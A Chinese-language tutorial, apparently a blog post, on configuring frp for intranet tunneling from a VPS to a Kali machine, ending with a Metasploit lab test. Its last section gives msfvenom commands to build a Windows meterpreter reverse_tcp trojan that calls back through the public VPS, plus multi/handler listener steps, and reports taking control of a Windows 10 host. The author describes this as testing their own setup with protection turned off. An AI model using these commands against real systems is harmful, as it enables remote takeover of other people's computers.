Frp实现端口转发内网穿透
准备工作
1.1 frp是什么
简单地说,frp就是一个反向代理软件,它体积轻量但功能很强大,可以使处于内网或防火墙后的设备对外界提供服务,它支持HTTP、TCP、UDP等众多协议。我们今天仅讨论TCP和UDP相关的内容。
截至本文完成,frp的最新版本为v0.31.2,本文使用最新版本。
1.2 需要工具
搭建一个完整的frp服务链,我们需要
- VPS一台(也可以是具有公网IP的实体机server)
- 访问目标设备(就是你最终要访问的设备本文使用kali Client)
Server服务端配置
2.1查看处理器架构
SSH连接到VPS之后运行如下命令查看处理器架构,根据架构下载不同版本的frp
2.2下载相关版本
Github项目地址:https://github.com/fatedier/frp
下载地址:https://github.com/fatedier/frp/releases
根据架构不同,选择相应版本并进行下载
- Wget https://github.com/fatedier/frp/releases/download/v0.31.2/frp_0.31.2_linux_amd64.tar.gz
2.3解压tar -zxvf frp_0.31.2_linux_amd64.tar.gz 文件夹改个名,方便使用 cp -r frp_0.31.2_linux_amd64 frp 把解压出来的文件夹复制到你想要的目录下,为了方便我直接放在用户目录下了,进入该目录 cd frp查看一下文件 ls -a
由于我们目前配置的是server服务端我们只需关注fps与frps.ini分别是服务端程序和服务端配置文件。
2.4修改frps.ini文件、
如果没有必要,端口均可使用默认值,token、user和password项请自行设置。
- “bind_port”表示用于客户端和服务端连接的端口,这个端口号我们之后在配置客户端的时候要用到。
- “dashboard_port”是服务端仪表板的端口,若使用7500端口,在配置完成服务启动后可以通过浏览器访问 x.x.x.x:7500 (其中x.x.x.x为VPS的IP)查看frp服务运行信息。
- “token”是用于客户端和服务端连接的口令,请自行设置并记录,稍后会用到。
- “dashboard_user”和“dashboard_pwd”表示打开仪表板页面登录的用户名和密码,自行设置即可。
- “vhost_http_port”和“vhost_https_port”用于反向代理HTTP主机时使用,本文不涉及HTTP协议,因而照抄或者删除这两条均可。
2.5运行frp服务端
编辑完成后保存
之后我们就可以运行frps的服务端了./frps -c frps.ini 如果看到屏幕输出这样一段内容,即表示运行正常,如果出现错误提示,请检查上面的步骤。
此时访问 x.x.x.x:7500 并使用自己设置的用户名密码登录,即可看到仪表板界面
2.6服务端后台运行
至此,我们的服务端仅运行在前台,如果Ctrl C停止或者关闭SSH窗口后,frps均会停止运行,因而我们使用 nohup命令将其运行在后台。nohup ./frps -c frps.ini &输出如下内容即表示正常运行
nohup: ignoring input and appending output to 'nohup.out'
此时可先使用Ctrl C关闭nohup,frps依然会在后台运行,使用jobs命令查看后台运行的程序 在结果中我们可以看到frps正在后台正常运行
[1] Running nohup ./frps -c frps.ini &
此时访问 x.x.x.x:7500 依然可以打开仪表板界面,至此,服务端即设置完成,
查看jobs;杀掉进程ps -aux | grep frps 然后kill
三、Cient客户端配置
3.1下载
根据架构不同,选择相应版本并进行下载
Wget https://github.com/fatedier/frp/releases/download/v0.31.2/frp_0.31.2_linux_amd64.tar.gz
我的kali是x64版本,重复服务端下载解压步骤就可以了
3.2修改frps.ini文件
由于我们目前配置的是cient只需关注fpc与frpc.ini, 分别是客户端程序和客户端配置文件
其中common字段下的三项即为服务端的设置。
- “server_addr”为服务端IP地址,填入即可。
- “server_port”为服务器端口,填入你设置的端口号即可,如果未改变就是7000
- “token”是你在服务器上设置的连接口令,原样填入即可。
frp实际使用时,会按照端口号进行对应的转发,
上面frpc.ini的rdp、smb字段都是自己定义的规则,自定义端口对应时格式如下。
- “[xxx]”表示一个规则名称,自己定义,便于查询即可。
- “type”表示转发的协议类型,有TCP和UDP等选项可以选择,如有需要请自行查询frp手册。
- “local_port”是本地应用的端口号,按照实际应用工作在本机的端口号填写即可。
- “remote_port”是该条规则在服务端开放的端口号,自己填写并记录即可。
3.3运行
与服务端运行方式向同,不再述。
FRP后台查看效果。
四、Metasploit渗透windows测试
4.1环境
内网kali攻击机
公网vps
链接手机热点的win10电脑
4.2 msfvenom制作Windows木马程序
由于只是测试frp反向代理 内网穿透 Metasploit渗透windows,所以这里不提及免杀并且关闭防护软件。
msfvenom -p windows/meterpreter/reverse_tcp lhost=你的公网ip lport=msf对应的公网端口1.exe
lhost:必需设置为你的公网ip
lport:设置你在frpc.ini的[msf] remote_port = xxxx
只有通过服务器的xxxx端口数据包才能成功转发到我们的kali上来,这也是为什么要用frp反向代理原因。
制作好后将11.exe发送到目标Windows上
4.3kali开启监听
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 127.0.0.1 #设置监听ip,必须和frpc中的local_ip 一致
lhost => 127.0.0.1
msf exploit(multi/handler) > set lport xxxx #设置监听端口,与frpc中的local_port一致
lport =>5555
msf exploit(multi/handler) > exploit
注意:
设置监听ip,必须和frpc中的local_ip 一致,也就是必须使用127.0.0.1
设置监听端口,与frpc中的local_port一致
4.4Windows端运行木马
Windows端运行木马,kali端发现win10主机上线成功,控制win10
至此, 反向代理 内网穿透 Metasploit渗透windows.搭建测试完成。